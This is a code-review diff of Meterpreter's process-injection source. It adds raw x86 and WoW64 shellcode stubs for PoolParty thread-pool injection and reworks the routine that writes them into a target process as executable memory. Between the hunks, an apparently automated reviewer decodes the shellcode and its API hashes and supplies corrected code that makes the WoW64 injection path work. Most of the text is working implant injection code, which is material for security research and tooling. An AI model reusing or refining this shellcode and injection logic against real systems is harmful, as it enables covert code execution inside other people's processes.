diff --git a/c/meterpreter/source/metsrv/base_inject.c b/c/meterpreter/source/metsrv/base_inject.c
index f55ca883..ce4a7716 100644
--- a/c/meterpreter/source/metsrv/base_inject.c
+++ b/c/meterpreter/source/metsrv/base_inject.c
@@ -78,19 +78,20 @@ BYTE apc_stub_x64[] = "\xFC\x80\x79\x10\x00\x0F\x85\x13\x01\x00\x00\xC6\x41\x10 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00"; -BYTE poolparty_stub_x86[] = "\xFC\xE9\xBE\x00\x00\x00\x5E\x55\x89\xE5\xE8\x8C\x00\x00\x00\x60" - "\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72" - "\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20" - "\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x57\x8B\x52\x10\x8B\x42\x3C" - "\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4C\x01\xD0\x50\x8B\x48\x18\x8B" - "\x58\x20\x01\xD3\x85\xC9\x74\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF" - "\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B" - "\x7D\x24\x75\xE0\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58" - "\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59" - "\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x83\x5B\xFF\x76\x10\x6A" - "\xFF\x68\x08\x87\x1D\x60\xFF\xD3\x31\xC9\x51\x51\xFF\x76\x08\xFF" - "\x36\x51\x51\x68\x38\x68\x0D\x16\xFF\xD3\x31\xC0\x39\xC0\x74\xFA" - "\xC9\xC2\x0C\x00\xE8\x3D\xFF\xFF\xFF"; +BYTE poolparty_stub_x86[] = "\xFC\xE9\xD2\x00\x00\x00\x5E\x55\x89\xE5\xE8\xA0\x00\x00\x00\x60" + "\x89\xE5\x31\xD2\x8C\xEA\x85\xD2\x75\x06\x64\x8B\x52\x30\xEB\x0C" + "\x31\xD2\x65\x8B\x52\x60\x81\xC2\x00\x10\x00\x00\x8B\x52\x0C\x8B" + "\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" + "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x57\x8B\x52" + "\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4C\x01\xD0\x50" + "\x8B\x48\x18\x8B\x58\x20\x01\xD3\x85\xC9\x74\x3C\x49\x8B\x34\x8B" + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE0\x58\x8B\x58\x24\x01\xD3\x66\x8B" + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x83\x5B" + "\xFF\x76\x10\x6A\xFF\x68\x08\x87\x1D\x60\xFF\xD3\x31\xC9\x51\x51" + 
"\xFF\x76\x08\xFF\x36\x51\x51\x68\x38\x68\x0D\x16\xFF\xD3\x31\xC0" + "\x39\xC0\x74\xFA\xC9\xC2\x0C\x00\xE8\x29\xFF\xFF\xFF"; BYTE poolparty_stub_x64[] = "\xFC\xE9\x09\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC8\x00\x00\x00" "\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48" 
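Review bot: The rebuilt `poolparty_stub_x86` carries no comment saying what changed, so a reader has to diff 221 opaque bytes to find out. Decoding the 20 bytes inserted after the initial `xor edx, edx`: `8C EA 85 D2 75 06` reads GS into edx and, when it is non-zero, skips the old `mov edx, fs:[edx+0x30]` in favour of `xor edx, edx; mov edx, gs:[edx+0x60]; add edx, 0x1000` — presumably locating the 32-bit PEB through the 64-bit TEB plus one page when running under WoW64, which the rest of this commit suggests but nothing here states. The relative offsets were adjusted consistently (`E9 BE`→`E9 D2`, `E8 8C`→`E8 A0`, tail `E8 3D FF FF FF`→`E8 29 FF FF FF`, all by 20), so the blob is internally coherent. I would add above the array a comment such as `/* x86 PoolParty stub: PEB via fs:[0x30] natively, gs:[0x60]+0x1000 under WoW64; assembled from <asm source> */`, naming the assembly file it was built from so the bytes can be regenerated and audited.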
@@ -110,6 +111,26 @@ BYTE poolparty_stub_x64[] = "\xFC\xE9\x09\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC "\x8B\x01\x4C\x8B\x49\x08\x48\x31\xC9\xBA\x00\x00\x10\x00\x51\x51" "\x41\xBA\x38\x68\x0D\x16\xFF\xD5\x31\xC0\x39\xC0\x74\xFA\x90\xE8" "\xF2\xFE\xFF\xFF"; + +BYTE x64tox86[] = "\xFC\xE9\x14\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC8\x00\x00\x00" + "\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48" + "\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A" + "\x4D\x31\xC9\x48\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9" + "\x0D\x41\x01\xC1\xE2\xED\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C" + "\x48\x01\xD0\x66\x81\x78\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00" + "\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40" + "\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6" + "\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0" + "\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40" + "\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0" + "\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58" + "\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A" + "\x48\x8B\x12\xE9\x4F\xFF\xFF\xFF\x5D\x41\xBA\x75\x3F\x47\x32\xFF" + "\xD5\x48\xC7\xC0\xFE\xFF\xFF\xFF\x48\x89\xC1\x48\x89\xF2\x4D\x31" + "\xC0\x4D\x31\xC9\x41\x51\x41\xBA\x13\xBF\xB3\xB9\xFF\xD5\x48\x31" + "\xC9\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41\xBA\x6D\xA2\xAF\xF3" + "\xFF\xD5\x48\x31\xC0\x48\x85\xC0\x74\xF8\xE8\xE7\xFE\xFF\xFF\xC3"; + /* * Attempt to gain code execution in the remote process via a call to ntdll!NtQueueApcThread * Note: Windows Server 2008R2 can blue screen if you use APC injection to inject into another sessions csrss.exe 
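Review bot: `x64tox86` lands as 288 opaque bytes with no comment on its purpose, origin or the memory layout it expects, and unlike the other stubs it is concatenated at runtime with `poolparty_stub_x86`, so its entry convention matters. Reading the bytes, the `E9 14 01 00 00` at offset 1 jumps to the `E8 E7 FE FF FF` at offset 282, whose return address — popped into rsi by the `5E` at offset 6 and later moved into rdx (`48 89 F2`) ahead of a hashed call — is offset 287, the trailing `C3`, while the caller appends the 32-bit stub at offset 288; if rsi is meant to be the 32-bit entry point that looks off by one, so please confirm against the assembly source rather than trust my decoding. A header comment naming the .asm it was assembled from, the APIs behind the three `mov r10d` immediates (`0x32473F75`, `0xB9B3BF13`, `0xF3AFA26D`, which look like block_api hashes) and the expected layout (`x64tox86` | `poolparty_stub_x86` | `POOLPARTYCONTEXT`) would let the next reviewer verify this without disassembling. The comment block at the end of the hunk belongs to the APC injection routine that follows, which is outside this hunk.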
@@ -520,7 +541,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW DWORD dwResult = ERROR_SUCCESS; DWORD dwTechnique = MIGRATE_TECHNIQUE_REMOTETHREAD; HANDLE hThread = NULL; - LPVOID lpPoolPartyStub = NULL; + LPVOID lpPoolPartyStub; POOLPARTYCONTEXT ctx = { 0 }; ctx.s.lpStartAddress = lpStartAddress; ctx.p.lpParameter = lpParameter; @@ -531,18 +552,28 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW DWORD dwStubSize = 0; DWORD dwPoolPartyVariant = POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION; + HANDLE hHeap = GetProcessHeap(); + do { - if (dwDestinationArch == dwMeterpreterArch) { - if (dwMeterpreterArch == PROCESS_ARCH_X64) { + if (TRUE) { + if (dwDestinationArch == PROCESS_ARCH_X64) { + dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_x64"); lpStub = &poolparty_stub_x64; dwStubSize = sizeof(poolparty_stub_x64) - 1; - } - else { + }else if (dwMeterpreterArch == PROCESS_ARCH_X86 && !IsWow64Process(GetCurrentProcess(), NULL)) { + dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_x86"); lpStub = &poolparty_stub_x86; dwStubSize = sizeof(poolparty_stub_x86) - 1; } + else { + dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_wow64"); + lpStub = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2); + memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1); + memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86)); + dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2; + } hTriggerEvent = CreateEvent(NULL, TRUE, FALSE, NULL); if (!hTriggerEvent) 
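Review bot: Dropping the `= NULL` initialiser from `LPVOID lpPoolPartyStub` means any `BREAK_WITH_ERROR` taken before the `VirtualAllocEx` assignment (the `CreateEvent` failure at the end of the next hunk, for one) leaves the pointer indeterminate; if the post-loop cleanup, which is outside this hunk, tests or frees `lpPoolPartyStub`, that is a read of an uninitialised variable and a possible `VirtualFreeEx` of a garbage address. Keep `LPVOID lpPoolPartyStub = NULL;` — it costs nothing and the neighbouring locals (`hThread = NULL`, `ctx = { 0 }`) follow that pattern. inject_via_poolparty starts before and continues after this hunk.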
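Review bot: `!IsWow64Process(GetCurrentProcess(), NULL)` in the new `else if` tests whether the call succeeded, not whether the process is WoW64 — the flag is returned through the PBOOL out-parameter, and with NULL passed the call fails, so as far as I can tell every x86 Meterpreter takes the native `poolparty_stub_x86` branch and the new wow64 path is unreachable from an x86 build. The fallback branch also has a one-byte heap overflow: the buffer is `sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2` bytes but the second `memcpy` copies `sizeof(poolparty_stub_x86)` bytes, so the literal's terminating NUL lands one past the allocation; the length must be `sizeof(poolparty_stub_x86) - 1`. The `HeapAlloc` result is never NULL-checked before the copies, and nothing in the visible hunks frees it after the stub is written to the target, so the block leaks on every call (the loop's exit path is outside this hunk). `if (TRUE) {` is dead nesting and should go together with its closing brace, which also lies outside the hunk. inject_via_poolparty starts before and continues after this hunk.
```c
	HANDLE hHeap = GetProcessHeap();
	BOOL bIsWow64 = FALSE;
	/* IsWow64Process reports the WoW64 state through the out-parameter; its return value is only call success. */
	IsWow64Process(GetCurrentProcess(), &bIsWow64);

	do {
		/* … unchanged: `if (TRUE) {` wrapper left in place here; its closing brace is outside this hunk … */
		if (dwDestinationArch == PROCESS_ARCH_X64) {
			/* … unchanged: poolparty_stub_x64 selection … */
		} else if (dwMeterpreterArch == PROCESS_ARCH_X86 && !bIsWow64) {
			/* … unchanged: poolparty_stub_x86 selection … */
		} else {
			dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_wow64");
			/* code bytes only: each stub literal carries a trailing NUL that is neither counted nor copied */
			dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2;
			lpStub = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwStubSize);
			if (!lpStub) {
				BREAK_WITH_ERROR("[INJECT] inject_via_poolparty: HeapAlloc failed!", ERROR_POOLPARTY_GENERIC);
			}
			memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1);
			memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86) - 1);
		}
```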
@@ -557,7 +588,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW } lpPoolPartyStub = VirtualAllocEx(hProcess, NULL, dwStubSize + sizeof(POOLPARTYCONTEXT), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); - //dprintf("[INJECT][inject_via_poolparty] ctx [%p] lpStartAddress: %p lpParameter %p hTriggerEvent %p", (LPBYTE) lpPoolPartyStub + dwStubSize, ctx.s.lpStartAddress, ctx.p.lpParameter, ctx.e.hTriggerEvent); + dprintf("[INJECT][inject_via_poolparty] ctx [%p] lpStartAddress: %p lpParameter %p hTriggerEvent %p", (LPBYTE) lpPoolPartyStub + dwStubSize, ctx.s.lpStartAddress, ctx.p.lpParameter, ctx.e.hTriggerEvent); if (!lpPoolPartyStub) { BREAK_WITH_ERROR("[INJECT] inject_via_poolparty: VirtualAllocEx failed!", ERROR_POOLPARTY_GENERIC); } @@ -570,7 +601,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW BREAK_WITH_ERROR("[INJECT] inject_via_poolparty: Cannot write custom shellcode!", ERROR_POOLPARTY_GENERIC); } - if (remote_tp_direct_insertion(hProcess, lpPoolPartyStub, (BYTE*)lpPoolPartyStub + dwStubSize, &hTriggerEvent) == ERROR_SUCCESS) { + if (remote_tp_direct_insertion(hProcess, dwDestinationArch, lpPoolPartyStub, (BYTE*)lpPoolPartyStub + dwStubSize, &hTriggerEvent) == ERROR_SUCCESS) { dprintf("[INJECT] inject_via_poolparty: injectied!"); } else { @@ -787,6 +818,7 @@ DWORD inject_dll_stealth (DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuff return dwResult; } + DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD dwDllLength, LPCSTR reflectiveLoader, LPVOID lpArg, SIZE_T stArgSize) { DWORD injected = 1; if (support_stealth_injection(dwDestinationArch)) { @@ -796,4 +828,4 @@ DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD injected = inject_dll_legacy(dwPid, dwDestinationArch, lpDllBuffer, dwDllLength, reflectiveLoader, lpArg, stArgSize); } return injected; -} +} \ No newline at end of file
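Review bot: The re-enabled `dprintf` computes `(LPBYTE) lpPoolPartyStub + dwStubSize` on the line before `if (!lpPoolPartyStub)` checks the `VirtualAllocEx` result, so on the failure path it performs pointer arithmetic on a null pointer — undefined behaviour in C, and a misleading `ctx [...]` log line emitted just before the `VirtualAllocEx failed!` error. Move the `dprintf` to just after the `BREAK_WITH_ERROR` block so it only runs on a valid allocation. inject_via_poolparty starts before and continues after this hunk.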